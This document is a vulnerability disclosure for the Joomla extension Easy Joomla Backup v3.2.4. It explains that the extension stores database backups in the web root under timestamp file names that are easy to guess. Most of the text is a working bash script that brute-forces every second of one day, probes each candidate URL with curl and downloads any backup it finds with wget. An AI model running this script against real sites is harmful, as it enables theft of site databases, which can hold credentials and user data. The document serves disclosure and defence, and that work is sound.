Title:Joomla extension Easy Joomla Backup v3.2.4 database backup exposure
The software creates a copy of the backup in the web root.  The file name is easily guessable as it's just a time stamp:

http://example.com/administrator/components/com_easyjoomlabackup/backups/DOMAIN_YEAR-MONTH-DAY_H-M-S.zip#!/bin/bash
#Larry W. Cashdollar, @_larry0 9/7/2017
#Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4
#https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup
MONTH=09
DAY=07
YEAR=2017
Z=0
#May need to set the DOMAIN to $1 the target depending on how WP is configured.
DOMAIN=192.168.0.163

echo "Scanning website for available backups:"
for y in `seq -w 0 23`; do
        for x in `seq -w 0 59`; do
                 Y=`echo "scale=2;($Z/86000)*100"|bc`;
                 echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH $Y%"
        for z in `seq -w 0 59`; do
                 Z=$(( $Z + 1 ));
                 CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
                 RESULT=`curl -s --head $CPATH|grep 200`;
                if [ -n "$RESULT" ]; then
                 echo ""
                 echo "[+] Location $CPATH Found";
                 echo "[+] Received $RESULT";
                 echo "Downloading......";
                 wget $CPATH
                fi;
        done
        done
done
echo "Completed."